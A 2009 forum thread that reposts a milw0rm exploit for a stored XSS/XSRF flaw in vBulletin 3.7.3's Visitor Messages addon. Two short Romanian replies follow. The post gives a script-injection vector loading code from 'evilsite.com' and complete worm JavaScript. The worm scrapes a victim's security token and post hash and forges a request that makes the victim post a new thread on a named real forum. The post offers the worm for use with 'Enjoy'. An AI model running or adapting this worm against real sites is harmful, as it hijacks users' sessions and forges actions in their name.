dRuNNNk Posted September 25, 2009 Report Share Posted September 25, 2009 /* ----------------------------- * Author = Mx * Title = vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm * Software = vBulletin * Addon = Visitor Messages * Version = 3.7.3 * Attack = XSS/XSRF - Description = A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included + with the visitor messages addon (a clone of a social network wall/comment area). - When posting XSS, the data is run through htmlentities(); before being displayed + to the general public/forum members. However, when posting a new message, - a new notification is sent to the commentee. The commenter posts a XSS vector such as + <script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php - under the domain, they are hit with an unfiltered xss attach. XSRF is also readily available + and I have included an example worm that makes the user post a new thread with your own - specified subject and message. * Enjoy. Greets to Zain, Ytcracker, and http://digitalgangster.com which was the first subject * of the attack method. * ----------------------------- */function getNewHttpObject() {var objType = false;try {objType = new ActiveXObject('Msxml2.XMLHTTP');} catch(e) {try {objType = new ActiveXObject('Microsoft.XMLHTTP');} catch(e) {objType = new XMLHttpRequest();}}return objType;}function getAXAH(url){var theHttpRequest = getNewHttpObject();theHttpRequest.onreadystatechange = function() {processAXAH();};theHttpRequest.open("GET", url);theHttpRequest.send(false);function processAXAH(){if (theHttpRequest.readyState == 4) {if (theHttpRequest.status == 200) {var str = theHttpRequest.responseText;var secloc = str.indexOf('var SECURITYTOKEN = "');var sectok = str.substring(21+secloc,secloc+51+21);var posloc = str.indexOf('posthash" value="');var postok = str.substring(17+posloc,posloc+32+17);var subject = 'subject text';var message = 'message text';postAXAH('http://digitalgangster.com/4um/newthread.php?do=postthread&f=5', 'subject=' + subject + '&message=' + message + '&wysiwyg=0&taglist=&iconid=0&s=&securitytoken=' + sectok + '&f=5&do=postthread&posthash=' + postok + 'poststarttime=1&loggedinuser=1&sbutton=Submit+New+Thread&signature=1&parseurl=1&emailupdate=0&polloptions=4');}}}}function postAXAH(url, params) {var theHttpRequest = getNewHttpObject();theHttpRequest.onreadystatechange = function() {processAXAHr(elementContainer);};theHttpRequest.open("POST", url);theHttpRequest.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=iso-8859-2');theHttpRequest.send(params);function processAXAHr(elementContainer){if (theHttpRequest.readyState == 4) {if (theHttpRequest.status == 200) {}}}}getAXAH('http://digitalgangster.com/4um/newthread.php?do=newthread&f=5');document.write('<iframe src="http://digitalgangster.com/4um/newthread.php?do=newthread&f=5">');# milw0rm.com [2008-11-20] Quote Link to comment Share on other sites More sharing options...
NeK Posted December 23, 2009 Report Share Posted December 23, 2009 si ce face? Quote Link to comment Share on other sites More sharing options...
Guest vini4p Posted December 23, 2009 Report Share Posted December 23, 2009 "vBulletin 3.7.3 Visitor Messages XSS" este grele sa citeste ce scrie ? Quote Link to comment Share on other sites More sharing options...